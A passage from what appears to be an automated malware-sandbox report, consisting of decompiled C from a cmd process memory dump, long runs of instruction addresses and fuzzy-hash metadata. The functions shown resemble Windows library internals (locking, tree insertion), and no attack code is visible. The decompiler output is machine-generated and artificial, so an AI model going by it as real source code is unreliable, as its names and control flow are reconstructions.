											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E03BF7D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x3bb5c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E03C0F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E03C0F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E03C57016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L03BF2400(_t267 + 0x20);
															}
															L03BF2400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E03C02397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E03BF2280(_t134, 0x3cc8608);
									__eflags =  *0x3cc6e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E03BEFFB0(_t198, _t241, 0x3cc8608);
										__eflags = _t253;
										if(_t253 != 0) {
											L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x3cc6e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x3cc8608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E03C06B90(_t210,  &_v64);
										_t262 =  *0x3cc8608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E03C0E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E03C197C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E03C1006A(0x3cc8608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x3cc8608);
												E03C1B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x3cc6904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x3cc6e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E03BEFFB0(_t198, _t240, 0x3cc8608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E03C100C2(0x3cc8608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                                                                                                                                          0x03c020a0
                                                                                                                                          0x03c020a8
                                                                                                                                          0x03c020ad
                                                                                                                                          0x03c020b3
                                                                                                                                          0x03c020b8
                                                                                                                                          0x03c020c2
                                                                                                                                          0x03c020c7
                                                                                                                                          0x03c020cb
                                                                                                                                          0x03c020d2
                                                                                                                                          0x03c02263
                                                                                                                                          0x03c02266
                                                                                                                                          0x03c45836
                                                                                                                                          0x03c45836
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0226c
                                                                                                                                          0x03c0226c
                                                                                                                                          0x03c02270
                                                                                                                                          0x03c02274
                                                                                                                                          0x03c020e2
                                                                                                                                          0x03c020e2
                                                                                                                                          0x03c020e6
                                                                                                                                          0x03c020ee
                                                                                                                                          0x03c457dc
                                                                                                                                          0x03c457de
                                                                                                                                          0x03c457ec
                                                                                                                                          0x03c457ec
                                                                                                                                          0x03c457f1
                                                                                                                                          0x03c457f3
                                                                                                                                          0x03c457f8
                                                                                                                                          0x00000000
                                                                                                                                          0x03c457f8
                                                                                                                                          0x03c457e0
                                                                                                                                          0x03c457e4
                                                                                                                                          0x03c457ea
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c457ea
                                                                                                                                          0x03c020f4
                                                                                                                                          0x03c020f4
                                                                                                                                          0x03c020f8
                                                                                                                                          0x03c020f8
                                                                                                                                          0x03c020fc
                                                                                                                                          0x03c02100
                                                                                                                                          0x03c02106
                                                                                                                                          0x03c02201
                                                                                                                                          0x03c02206
                                                                                                                                          0x03c0220b
                                                                                                                                          0x03c0220e
                                                                                                                                          0x03c022a9
                                                                                                                                          0x03c022ac
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c022b2
                                                                                                                                          0x03c022b5
                                                                                                                                          0x03c45801
                                                                                                                                          0x03c45806
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c45810
                                                                                                                                          0x03c45815
                                                                                                                                          0x03c45818
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c4581e
                                                                                                                                          0x03c022bb
                                                                                                                                          0x03c022bb
                                                                                                                                          0x03c02218
                                                                                                                                          0x03c02218
                                                                                                                                          0x03c0221c
                                                                                                                                          0x03c02220
                                                                                                                                          0x03c02222
                                                                                                                                          0x03c022c2
                                                                                                                                          0x03c022c4
                                                                                                                                          0x03c022dc
                                                                                                                                          0x03c022dc
                                                                                                                                          0x03c022e1
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c022e7
                                                                                                                                          0x03c022c8
                                                                                                                                          0x03c022cd
                                                                                                                                          0x03c022d3
                                                                                                                                          0x03c022d6
                                                                                                                                          0x03c45823
                                                                                                                                          0x03c45825
                                                                                                                                          0x03c45827
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c4582d
                                                                                                                                          0x00000000
                                                                                                                                          0x03c4582d
                                                                                                                                          0x00000000
                                                                                                                                          0x03c02228
                                                                                                                                          0x03c02228
                                                                                                                                          0x00000000
                                                                                                                                          0x03c02228
                                                                                                                                          0x03c02222
                                                                                                                                          0x03c02214
                                                                                                                                          0x03c02214
                                                                                                                                          0x00000000
                                                                                                                                          0x03c02114
                                                                                                                                          0x03c02114
                                                                                                                                          0x03c02114
                                                                                                                                          0x03c0211a
                                                                                                                                          0x03c0211c
                                                                                                                                          0x03c02348
                                                                                                                                          0x03c0234d
                                                                                                                                          0x03c45840
                                                                                                                                          0x03c45845
                                                                                                                                          0x03c45848
                                                                                                                                          0x03c4584e
                                                                                                                                          0x03c4584e
                                                                                                                                          0x03c45848
                                                                                                                                          0x03c02353
                                                                                                                                          0x03c02355
                                                                                                                                          0x03c02388
                                                                                                                                          0x03c02388
                                                                                                                                          0x03c02368
                                                                                                                                          0x03c0236a
                                                                                                                                          0x03c0236c
                                                                                                                                          0x03c0238f
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0236e
                                                                                                                                          0x03c0236e
                                                                                                                                          0x03c0218e
                                                                                                                                          0x03c0218e
                                                                                                                                          0x03c02191
                                                                                                                                          0x03c02195
                                                                                                                                          0x03c45a03
                                                                                                                                          0x03c45a06
                                                                                                                                          0x03c45a0c
                                                                                                                                          0x03c45a0f
                                                                                                                                          0x03c45a11
                                                                                                                                          0x03c45a13
                                                                                                                                          0x03c45a13
                                                                                                                                          0x03c45a19
                                                                                                                                          0x03c45a1f
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0219b
                                                                                                                                          0x03c0219b
                                                                                                                                          0x03c021a0
                                                                                                                                          0x03c02282
                                                                                                                                          0x03c02284
                                                                                                                                          0x03c02284
                                                                                                                                          0x03c02284
                                                                                                                                          0x03c02284
                                                                                                                                          0x03c021a6
                                                                                                                                          0x03c021a9
                                                                                                                                          0x03c021ac
                                                                                                                                          0x03c021ae
                                                                                                                                          0x03c021b3
                                                                                                                                          0x03c0228b
                                                                                                                                          0x03c02290
                                                                                                                                          0x03c02379
                                                                                                                                          0x03c02296
                                                                                                                                          0x03c02298
                                                                                                                                          0x03c02298
                                                                                                                                          0x03c02290
                                                                                                                                          0x03c021b9
                                                                                                                                          0x03c021be
                                                                                                                                          0x03c022a2
                                                                                                                                          0x03c022a2
                                                                                                                                          0x03c021c4
                                                                                                                                          0x03c021c8
                                                                                                                                          0x03c021cc
                                                                                                                                          0x03c021d0
                                                                                                                                          0x03c021d4
                                                                                                                                          0x03c021de
                                                                                                                                          0x03c021e3
                                                                                                                                          0x03c45a29
                                                                                                                                          0x03c45a2c
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c45a3b
                                                                                                                                          0x00000000
                                                                                                                                          0x03c021e9
                                                                                                                                          0x03c021e9
                                                                                                                                          0x03c021e9
                                                                                                                                          0x03c021ee
                                                                                                                                          0x03c021f1
                                                                                                                                          0x03c45a45
                                                                                                                                          0x03c45a4b
                                                                                                                                          0x03c45a52
                                                                                                                                          0x03c45a58
                                                                                                                                          0x03c45a5d
                                                                                                                                          0x03c45a5f
                                                                                                                                          0x03c45a71
                                                                                                                                          0x03c45a61
                                                                                                                                          0x03c45a6a
                                                                                                                                          0x03c45a6a
                                                                                                                                          0x03c45a76
                                                                                                                                          0x03c45a79
                                                                                                                                          0x03c45a7f
                                                                                                                                          0x03c45a83
                                                                                                                                          0x03c45a85
                                                                                                                                          0x03c45a87
                                                                                                                                          0x03c45a87
                                                                                                                                          0x03c45a8c
                                                                                                                                          0x03c45a91
                                                                                                                                          0x03c45a97
                                                                                                                                          0x03c45a9f
                                                                                                                                          0x03c45aa0
                                                                                                                                          0x03c45aa1
                                                                                                                                          0x03c45aa6
                                                                                                                                          0x03c45aab
                                                                                                                                          0x03c45ab1
                                                                                                                                          0x03c45ab3
                                                                                                                                          0x03c45ab9
                                                                                                                                          0x03c45aca
                                                                                                                                          0x03c45ad4
                                                                                                                                          0x03c45ad4
                                                                                                                                          0x03c45ade
                                                                                                                                          0x03c45ade
                                                                                                                                          0x03c45aab
                                                                                                                                          0x03c45a79
                                                                                                                                          0x03c45a52
                                                                                                                                          0x03c021f7
                                                                                                                                          0x03c021f9
                                                                                                                                          0x03c021fe
                                                                                                                                          0x03c021fe
                                                                                                                                          0x03c021e3
                                                                                                                                          0x03c02195
                                                                                                                                          0x03c0236c
                                                                                                                                          0x03c02122
                                                                                                                                          0x03c02122
                                                                                                                                          0x03c02124
                                                                                                                                          0x03c02231
                                                                                                                                          0x03c02236
                                                                                                                                          0x03c02236
                                                                                                                                          0x03c02238
                                                                                                                                          0x03c02238
                                                                                                                                          0x03c02240
                                                                                                                                          0x03c02242
                                                                                                                                          0x03c02244
                                                                                                                                          0x03c459fc
                                                                                                                                          0x03c0218c
                                                                                                                                          0x03c0218c
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0218c
                                                                                                                                          0x03c0224a
                                                                                                                                          0x03c0224f
                                                                                                                                          0x03c02256
                                                                                                                                          0x03c02304
                                                                                                                                          0x03c02309
                                                                                                                                          0x03c0230f
                                                                                                                                          0x03c0231e
                                                                                                                                          0x03c0231e
                                                                                                                                          0x03c0231e
                                                                                                                                          0x03c02320
                                                                                                                                          0x03c02325
                                                                                                                                          0x03c0232a
                                                                                                                                          0x03c0232c
                                                                                                                                          0x03c0233e
                                                                                                                                          0x03c0233e
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0232c
                                                                                                                                          0x03c02311
                                                                                                                                          0x03c02317
                                                                                                                                          0x03c0231a
                                                                                                                                          0x03c0231c
                                                                                                                                          0x03c02380
                                                                                                                                          0x03c02380
                                                                                                                                          0x03c02380
                                                                                                                                          0x03c02384
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c02386
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0231c
                                                                                                                                          0x03c0225c
                                                                                                                                          0x03c0225c
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0225c
                                                                                                                                          0x03c0212a
                                                                                                                                          0x03c02134
                                                                                                                                          0x03c02138
                                                                                                                                          0x03c0213d
                                                                                                                                          0x03c45858
                                                                                                                                          0x03c45863
                                                                                                                                          0x03c45863
                                                                                                                                          0x03c45867
                                                                                                                                          0x03c4586a
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c4586c
                                                                                                                                          0x03c4586c
                                                                                                                                          0x03c45871
                                                                                                                                          0x03c45875
                                                                                                                                          0x03c45877
                                                                                                                                          0x03c45997
                                                                                                                                          0x03c4599c
                                                                                                                                          0x03c459a1
                                                                                                                                          0x03c459a7
                                                                                                                                          0x03c459a7
                                                                                                                                          0x00000000
                                                                                                                                          0x03c459a7
                                                                                                                                          0x03c4587d
                                                                                                                                          0x00000000
                                                                                                                                          0x03c4588b
                                                                                                                                          0x03c4588b
                                                                                                                                          0x03c45890
                                                                                                                                          0x03c45892
                                                                                                                                          0x03c45894
                                                                                                                                          0x03c45899
                                                                                                                                          0x03c4589b
                                                                                                                                          0x03c458a0
                                                                                                                                          0x03c458a0
                                                                                                                                          0x03c458aa
                                                                                                                                          0x03c458b2
                                                                                                                                          0x03c458b6
                                                                                                                                          0x03c458be
                                                                                                                                          0x03c458c6
                                                                                                                                          0x03c458c9
                                                                                                                                          0x03c4590d
                                                                                                                                          0x03c45917
                                                                                                                                          0x03c4591a
                                                                                                                                          0x03c4591c
                                                                                                                                          0x03c45920
                                                                                                                                          0x03c45928
                                                                                                                                          0x03c4592a
                                                                                                                                          0x03c4592c
                                                                                                                                          0x03c4592e
                                                                                                                                          0x03c4592e
                                                                                                                                          0x03c458cb
                                                                                                                                          0x03c458cd
                                                                                                                                          0x03c458d8
                                                                                                                                          0x03c458e0
                                                                                                                                          0x03c458f4
                                                                                                                                          0x03c458fe
                                                                                                                                          0x03c458fe
                                                                                                                                          0x03c4593a
                                                                                                                                          0x03c4593e
                                                                                                                                          0x03c45940
                                                                                                                                          0x03c45942
                                                                                                                                          0x00000000
                                                                                                                                          0x03c45944
                                                                                                                                          0x03c45944
                                                                                                                                          0x03c45949
                                                                                                                                          0x03c4594e
                                                                                                                                          0x03c4594e
                                                                                                                                          0x03c45953
                                                                                                                                          0x03c4595b
                                                                                                                                          0x03c45976
                                                                                                                                          0x03c45976
                                                                                                                                          0x03c4597a
                                                                                                                                          0x03c4597f
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c45981
                                                                                                                                          0x03c45981
                                                                                                                                          0x03c45981
                                                                                                                                          0x03c45983
                                                                                                                                          0x03c45988
                                                                                                                                          0x03c4598d
                                                                                                                                          0x03c45991
                                                                                                                                          0x03c45991
                                                                                                                                          0x00000000
                                                                                                                                          0x03c4595d
                                                                                                                                          0x03c4595d
                                                                                                                                          0x03c45963
                                                                                                                                          0x03c45965
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c45967
                                                                                                                                          0x03c45967
                                                                                                                                          0x03c4596b
                                                                                                                                          0x03c4596d
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c4596f
                                                                                                                                          0x03c45971
                                                                                                                                          0x03c45971
                                                                                                                                          0x03c45974
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c45974
                                                                                                                                          0x00000000
                                                                                                                                          0x03c45967
                                                                                                                                          0x03c4595b
                                                                                                                                          0x03c45942
                                                                                                                                          0x03c45863
                                                                                                                                          0x03c02143
                                                                                                                                          0x03c02143
                                                                                                                                          0x03c02149
                                                                                                                                          0x03c0214f
                                                                                                                                          0x03c022f1
                                                                                                                                          0x03c022f6
                                                                                                                                          0x00000000
                                                                                                                                          0x03c02173
                                                                                                                                          0x03c02173
                                                                                                                                          0x03c0217d
                                                                                                                                          0x03c02181
                                                                                                                                          0x03c02186
                                                                                                                                          0x03c459ae
                                                                                                                                          0x03c459b2
                                                                                                                                          0x03c459b5
                                                                                                                                          0x03c459b7
                                                                                                                                          0x03c459ba
                                                                                                                                          0x03c459cd
                                                                                                                                          0x03c459d1
                                                                                                                                          0x03c459d5
                                                                                                                                          0x03c459d9
                                                                                                                                          0x03c459db
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c459dd
                                                                                                                                          0x03c459dd
                                                                                                                                          0x03c459e1
                                                                                                                                          0x03c459e4
                                                                                                                                          0x03c459e7
                                                                                                                                          0x03c459ee
                                                                                                                                          0x03c459ee
                                                                                                                                          0x03c459f3
                                                                                                                                          0x03c459f3
                                                                                                                                          0x00000000
                                                                                                                                          0x03c02186
                                                                                                                                          0x03c0214f
                                                                                                                                          0x03c02106
                                                                                                                                          0x03c02266
                                                                                                                                          0x03c020d8
                                                                                                                                          0x03c020da
                                                                                                                                          0x03c020e0
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: e8c60594b7ed8fec774dffa6d6b239385ece825199fda9bfe0b95077851ba26f
                                                                                                                                          • Instruction ID: 1c2627fa806a14773d3fa0b324746c38c97535ef44b0b2526d483d6c0014ff6d
                                                                                                                                          • Opcode Fuzzy Hash: e8c60594b7ed8fec774dffa6d6b239385ece825199fda9bfe0b95077851ba26f
                                                                                                                                          • Instruction Fuzzy Hash: B5F1F271A083859FDB25CF29C44476BB7E9AF86724F08896DE895CF2C0D735D941CB82
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03BEB090 Relevance: .4, Instructions: 405COMMONCrypto
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 99%
                                                                                                                                          			E03BEB090(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _t117;
				signed int _t119;
				signed int _t120;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				signed int _t126;
				signed int _t134;
				signed int _t139;
				signed char _t143;
				signed int _t144;
				signed int _t146;
				signed int _t148;
				signed int* _t150;
				signed int _t152;
				signed int _t161;
				signed char _t165;
				signed int _t167;
				signed int _t170;
				signed int _t174;
				signed char _t177;
				signed int _t178;
				signed int _t181;
				signed int _t182;
				signed int _t187;
				signed int _t190;
				signed int _t192;
				signed int _t194;
				signed int _t196;
				signed int _t199;
				signed int _t202;
				signed int _t208;
				signed int _t211;

				_t182 = _a16;
				_t178 = _a8;
				_t161 = _a4;
				 *_t182 = 0;
				 *(_t182 + 4) = 0;
				_t5 = _t161 + 4; // 0x4
				_t117 =  *_t5 & 0x00000001;
				if(_t178 == 0) {
					 *_t161 = _t182;
					 *(_t161 + 4) = _t182;
					if(_t117 != 0) {
						_t117 = _t182 | 0x00000001;
						 *(_t161 + 4) = _t117;
					}
					 *(_t182 + 8) = 0;
					goto L43;
				} else {
					_t208 = _t182 ^ _t178;
					_t192 = _t208;
					if(_t117 == 0) {
						_t192 = _t182;
					}
					_t117 = _a12 & 0x000000ff;
					 *(_t178 + _t117 * 4) = _t192;
					if(( *(_t161 + 4) & 0x00000001) == 0) {
						_t208 = _t178;
					}
					 *(_t182 + 8) = _t208 | 0x00000001;
					if(_a12 == 0) {
						_t14 = _t161 + 4; // 0x4
						_t177 =  *_t14;
						_t117 = _t177 & 0xfffffffe;
						if(_t178 == _t117) {
							_t117 = _a4;
							 *(_t117 + 4) = _t182;
							if((_t177 & 0x00000001) != 0) {
								_t161 = _a4;
								_t117 = _t182 | 0x00000001;
								 *(_t161 + 4) = _t117;
							} else {
								_t161 = _t117;
							}
						} else {
							_t161 = _a4;
						}
					}
					if(( *(_t178 + 8) & 0x00000001) == 0) {
						L42:
						L43:
						return _t117;
					} else {
						_t19 = _t161 + 4; // 0x4
						_t165 =  *_t19 & 0x00000001;
						do {
							_t211 =  *(_t178 + 8) & 0xfffffffc;
							if(_t165 != 0) {
								if(_t211 != 0) {
									_t211 = _t211 ^ _t178;
								}
							}
							_t119 =  *_t211;
							if(_t165 != 0) {
								if(_t119 != 0) {
									_t119 = _t119 ^ _t211;
								}
							}
							_t120 = 0;
							_t121 = _t120 & 0xffffff00 | _t119 != _t178;
							_v8 = _t121;
							_t122 = _t121 ^ 0x00000001;
							_v16 = _t122;
							_t123 =  *(_t211 + _t122 * 4);
							if(_t165 != 0) {
								if(_t123 == 0) {
									goto L20;
								}
								_t123 = _t123 ^ _t211;
								goto L13;
							} else {
								L13:
								if(_t123 == 0 || ( *(_t123 + 8) & 0x00000001) == 0) {
									L20:
									_t194 = _v16;
									if((_a12 & 0x000000ff) != _v8) {
										_t126 =  *(_t182 + 8) & 0xfffffffc;
										_t167 = _t165 & 1;
										_v12 = _t167;
										if(_t167 != 0) {
											if(_t126 != 0) {
												_t126 = _t126 ^ _t182;
											}
										}
										if(_t126 != _t178) {
											L83:
											_t178 = 0x1d;
											asm("int 0x29");
											goto L84;
										} else {
											_t126 =  *(_t178 + _t194 * 4);
											if(_t167 != 0) {
												if(_t126 != 0) {
													_t126 = _t126 ^ _t178;
												}
											}
											if(_t126 != _t182) {
												goto L83;
											} else {
												_t126 =  *(_t211 + _v8 * 4);
												if(_t167 != 0) {
													if(_t126 != 0) {
														_t126 = _t126 ^ _t211;
													}
												}
												if(_t126 != _t178) {
													goto L83;
												} else {
													_t77 = _t178 + 8; // 0x8
													_t150 = _t77;
													_v20 = _t150;
													_t126 =  *_t150 & 0xfffffffc;
													if(_t167 != 0) {
														if(_t126 != 0) {
															_t126 = _t126 ^ _t178;
														}
													}
													if(_t126 != _t211) {
														goto L83;
													} else {
														_t202 = _t211 ^ _t182;
														_t152 = _t202;
														if(_t167 == 0) {
															_t152 = _t182;
														}
														 *(_t211 + _v8 * 4) = _t152;
														_t170 = _v12;
														if(_t170 == 0) {
															_t202 = _t211;
														}
														 *(_t182 + 8) =  *(_t182 + 8) & 0x00000003 | _t202;
														_t126 =  *(_t182 + _v8 * 4);
														if(_t170 != 0) {
															if(_t126 == 0) {
																L58:
																if(_t170 != 0) {
																	if(_t126 != 0) {
																		_t126 = _t126 ^ _t178;
																	}
																}
																 *(_t178 + _v16 * 4) = _t126;
																_t199 = _t178 ^ _t182;
																if(_t170 != 0) {
																	_t178 = _t199;
																}
																 *(_t182 + _v8 * 4) = _t178;
																if(_t170 == 0) {
																	_t199 = _t182;
																}
																 *_v20 =  *_v20 & 0x00000003 | _t199;
																_t178 = _t182;
																_t167 =  *((intOrPtr*)(_a4 + 4));
																goto L21;
															}
															_t126 = _t126 ^ _t182;
														}
														if(_t126 != 0) {
															_t167 =  *(_t126 + 8);
															_t194 = _t167 & 0xfffffffc;
															if(_v12 != 0) {
																L84:
																if(_t194 != 0) {
																	_t194 = _t194 ^ _t126;
																}
															}
															if(_t194 != _t182) {
																goto L83;
															}
															if(_v12 != 0) {
																_t196 = _t126 ^ _t178;
															} else {
																_t196 = _t178;
															}
															 *(_t126 + 8) = _t167 & 0x00000003 | _t196;
															_t170 = _v12;
														}
														goto L58;
													}
												}
											}
										}
									}
									L21:
									_t182 = _v8 ^ 0x00000001;
									_t126 =  *(_t178 + 8) & 0xfffffffc;
									_v8 = _t182;
									_t194 = _t167 & 1;
									if(_t194 != 0) {
										if(_t126 != 0) {
											_t126 = _t126 ^ _t178;
										}
									}
									if(_t126 != _t211) {
										goto L83;
									} else {
										_t134 = _t182 ^ 0x00000001;
										_v16 = _t134;
										_t126 =  *(_t211 + _t134 * 4);
										if(_t194 != 0) {
											if(_t126 != 0) {
												_t126 = _t126 ^ _t211;
											}
										}
										if(_t126 != _t178) {
											goto L83;
										} else {
											_t167 = _t211 + 8;
											_t182 =  *_t167 & 0xfffffffc;
											_v20 = _t167;
											if(_t194 != 0) {
												if(_t182 == 0) {
													L80:
													_t126 = _a4;
													if( *_t126 != _t211) {
														goto L83;
													}
													 *_t126 = _t178;
													L34:
													if(_t194 != 0) {
														if(_t182 != 0) {
															_t182 = _t182 ^ _t178;
														}
													}
													 *(_t178 + 8) =  *(_t178 + 8) & 0x00000003 | _t182;
													_t139 =  *((intOrPtr*)(_t178 + _v8 * 4));
													if(_t194 != 0) {
														if(_t139 == 0) {
															goto L37;
														}
														_t126 = _t139 ^ _t178;
														goto L36;
													} else {
														L36:
														if(_t126 != 0) {
															_t167 =  *(_t126 + 8);
															_t182 = _t167 & 0xfffffffc;
															if(_t194 != 0) {
																if(_t182 != 0) {
																	_t182 = _t182 ^ _t126;
																}
															}
															if(_t182 != _t178) {
																goto L83;
															} else {
																if(_t194 != 0) {
																	_t190 = _t126 ^ _t211;
																} else {
																	_t190 = _t211;
																}
																 *(_t126 + 8) = _t167 & 0x00000003 | _t190;
																_t167 = _v20;
																goto L37;
															}
														}
														L37:
														if(_t194 != 0) {
															if(_t139 != 0) {
																_t139 = _t139 ^ _t211;
															}
														}
														 *(_t211 + _v16 * 4) = _t139;
														_t187 = _t211 ^ _t178;
														if(_t194 != 0) {
															_t211 = _t187;
														}
														 *(_t178 + _v8 * 4) = _t211;
														if(_t194 == 0) {
															_t187 = _t178;
														}
														_t143 =  *_t167 & 0x00000003 | _t187;
														 *_t167 = _t143;
														_t117 = _t143 | 0x00000001;
														 *_t167 = _t117;
														 *(_t178 + 8) =  *(_t178 + 8) & 0x000000fe;
														goto L42;
													}
												}
												_t182 = _t182 ^ _t211;
											}
											if(_t182 == 0) {
